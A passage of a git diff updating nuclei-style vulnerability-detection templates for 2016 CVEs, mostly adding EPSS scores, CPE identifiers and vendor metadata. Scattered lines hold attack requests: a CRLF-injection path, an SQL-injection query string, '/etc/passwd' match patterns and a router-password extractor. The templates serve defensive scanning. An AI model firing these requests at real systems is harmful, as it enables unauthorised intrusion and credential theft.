CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/hdw-tube" + framework: wordpress + vendor: hdw-tube_project + product: hdw-tube tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 6d5e194125..ddf170e830 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/heat-trackr" + framework: wordpress + vendor: heat-trackr_project + product: heat-trackr tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 6418e4da04..f8ed55f4d4 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - https://wordpress.org/plugins/hero-maps-pro - - http://web.archive.org/web/20210123183224/https://www.securityfocus.com/bid/93815/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,maps + epss-score: 0.001 + cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: hero-maps-pro_project + product: hero-maps-pro + tags: cve,cve2016,wordpress,xss,wp-plugin,maps http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 6ca1ef4786..d63886fd31 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/indexisto" + framework: wordpress + vendor: indexisto_project + product: indexisto tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index b475e5195c..5c9a04c0ac 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000139 cwe-id: CWE-79 + epss-score: 0.00116 + cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/infusionsoft" + framework: wordpress + vendor: infusionsoft_project + product: infusionsoft tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: @@ -28,11 +33,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '"><"' - 'input type="text" name="ContactId"' condition: and - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index dcef099c48..f9b9ddbb8c 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 - https://wordpress.org/plugins/new-year-firework - - http://web.archive.org/web/20210123183230/https://www.securityfocus.com/bid/93817/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: new-year-firework_project + product: new-year-firework + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 08d8445568..dcd7398dd7 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 + epss-score: 0.00142 + cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/page-layout-builder" + framework: wordpress + vendor: page-layout-builder_project + product: page-layout-builder tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 278c585382..fce3b936c2 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000142 cwe-id: CWE-79 - tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve + epss-score: 0.00103 + cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: parsi-font_project + product: parsi-font + tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 0ea9c628b3..cb2e360636 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss + epss-score: 0.00142 + cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: photoxhibit_project + product: photoxhibit + tags: cve,cve2016,wordpress,wp-plugin,xss http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 04c9f1328c..b7d716f5b8 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 - https://wordpress.org/plugins/pondol-formmail - - http://web.archive.org/web/20210615122859/https://www.securityfocus.com/bid/93584 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,mail + epss-score: 0.00119 + cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: pondol-formmail_project + product: pondol-formmail + tags: cve,cve2016,wordpress,xss,wp-plugin,mail http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index fd8647776b..4ec082eb05 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000148 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan + epss-score: 0.00119 + cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: s3-video_project + product: s3-video + tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '<"' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 9ea1b58aee..e4cd2c79db 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/simpel-reserveren - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: simpel-reserveren_project + product: simpel-reserveren + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 26b3aafbaf..75c9aeb247 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 - https://wordpress.org/plugins/tidio-form - - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000152 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00249 + cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: tidio-form_project + product: tidio-form + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 42b3505143..b9cb2155fb 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -9,15 +9,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 - https://wordpress.org/plugins/tidio-gallery - - http://web.archive.org/web/20210123180207/https://www.securityfocus.com/bid/93543/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.001 + cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: tidio-gallery_project + product: tidio-gallery + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index edf2e75fb5..69fc49e624 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00142 + cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: browserweb + product: whizz + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 548fed602e..aa6e5de965 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/wpsolr-search-engine - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - http://web.archive.org/web/20210123180137/https://www.securityfocus.com/bid/93536/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00103 + cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpsolr + product: wpsolr-search-engine + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index a676cc7122..af008b59ce 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -10,15 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 - https://www.exploit-db.com/exploits/40970/ - https://www.exploit-db.com/exploits/40968/ + - http://seclists.org/fulldisclosure/2016/Dec/78 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 - epss-score: 0.97459 - tags: cve,cve2016,rce,edb,wordpress + epss-score: 0.97464 + cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: phpmailer_project + product: phpmailer + tags: seclists,cve,cve2016,rce,edb,wordpress http: - raw: @@ -36,22 +40,23 @@ http: wp-submit=Get+New+Password&redirect_to=&user_login={{username}} unsafe: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 794dba76ff..6d40e10c27 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic - http://seclists.org/fulldisclosure/2016/Feb/112 + - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - tags: netgear,rce,oast,router,kev,seclists,cve,cve2016 + epss-score: 0.97385 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: wnap320_firmware + tags: seclists,packetstorm,netgear,rce,oast,router,kev,cve,cve2016 http: - raw: @@ -31,6 +36,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 180ddbc9ea..81a67bc3de 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -10,15 +10,20 @@ info: - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html - https://www.exploit-db.com/exploits/39837/ - https://nvd.nist.gov/vuln/detail/CVE-2016-2389 + - http://seclists.org/fulldisclosure/2016/May/40 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-2389 cwe-id: CWE-22 + epss-score: 0.24589 + cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: lfi,sap,packetstorm,edb,cve,cve2016 + vendor: sap + product: netweaver + tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index eb99e6faee..8a6410c511 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -11,14 +11,19 @@ info: - https://struts.apache.org/docs/s2-032.html - https://nvd.nist.gov/vuln/detail/CVE-2016-3081 - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665 + - http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-3081 cwe-id: CWE-77 - tags: cve,cve2016,struts,rce,apache + epss-score: 0.97524 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2016,struts,rce,apache http: - raw: @@ -28,9 +33,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 70a549181f..96664a0b13 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -10,15 +10,19 @@ info: - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 + - http://rhn.redhat.com/errata/RHSA-2016-2036.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 - tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive + epss-score: 0.83955 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: apache + product: activemq + tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' @@ -29,7 +33,6 @@ http: Host: {{Hostname}} {{rand1}} - - | GET /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index e514a51f79..afa4cbfe17 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -9,14 +9,19 @@ info: - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.securitytracker.com/id/1035332 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 - tags: cve2016,redirect,fortinet,fortios,seclists,cve + epss-score: 0.00217 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fortinet + product: fortios + tags: cve2016,redirect,fortinet,fortios,seclists,cve http: - method: GET diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 56da989e55..23ff51f926 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -11,15 +11,18 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437 - http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html - http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html + - http://rhn.redhat.com/errata/RHSA-2016-2035.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-4437 cwe-id: CWE-284 + epss-score: 0.97483 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* - epss-score: 0.9748 metadata: max-request: 1 + vendor: apache + product: shiro tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization,oast http: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 585689c767..87c413a791 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -8,20 +8,28 @@ info: reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E + - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E + - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 - tags: cve,cve2016,crlf,generic,apache + epss-score: 0.00366 + cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: http_server + tags: cve,cve2016,crlf,generic,apache http: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + matchers: - type: regex part: header diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 4c2bf4c1db..b62d9b6141 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -10,15 +10,20 @@ info: - https://tanzu.vmware.com/security/cve-2016-4977 - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 - https://pivotal.io/security/cve-2016-4977 + - http://www.openwall.com/lists/oss-security/2019/10/16/1 remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring + epss-score: 0.03345 + cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: pivotal + product: spring_security_oauth + tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring http: - method: GET diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index b3096f1395..fb3eb43ba9 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -13,10 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-5649 - cwe-id: CWE-200 - tags: cve,cve2016,iot,netgear,router,packetstorm + cwe-id: CWE-200,CWE-319 + epss-score: 0.10584 + cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: dgn2200_firmware + tags: cve,cve2016,iot,netgear,router,packetstorm http: - raw: @@ -27,19 +31,19 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "Smart Wizard Result " + - type: status status: - 200 - - type: word - words: - - "Smart Wizard Result " - part: body - extractors: - type: regex name: password - part: body group: 1 regex: - 'Success "([a-z]+)"' + part: body diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 59edb97f43..bedd2a5e56 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -3,23 +3,28 @@ id: CVE-2016-6195 info: name: vBulletin <= 4.2.3 - SQL Injection author: MaStErChO - severity: high + severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 - - https://www.securityfocus.com/bid/94312 - https://enumerated.wordpress.com/2016/07/11/1/ + - http://www.vbulletin.org/forum/showthread.php?t=322848 + - https://github.com/drewlong/vbully classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-6195 cwe-id: CWE-89 + epss-score: 0.00284 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: max-request: 6 shodan-query: title:"Powered By vBulletin" verified: "true" + vendor: vbulletin + product: vbulletin tags: cve,cve2016,vbulletin,sqli,forum,edb http: @@ -33,6 +38,7 @@ http: - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index d7827955b4..47de0f0ac0 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://www.kb.cert.org/vuls/id/582384 + - http://kb.netgear.com/000036386/CVE-2016-582384 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 - tags: cve,cve2016,netgear,rce,iot,kev + epss-score: 0.97471 + cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: d6220_firmware + tags: cve,cve2016,netgear,rce,iot,kev http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 4b2595f051..cfce9fa1bf 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -9,14 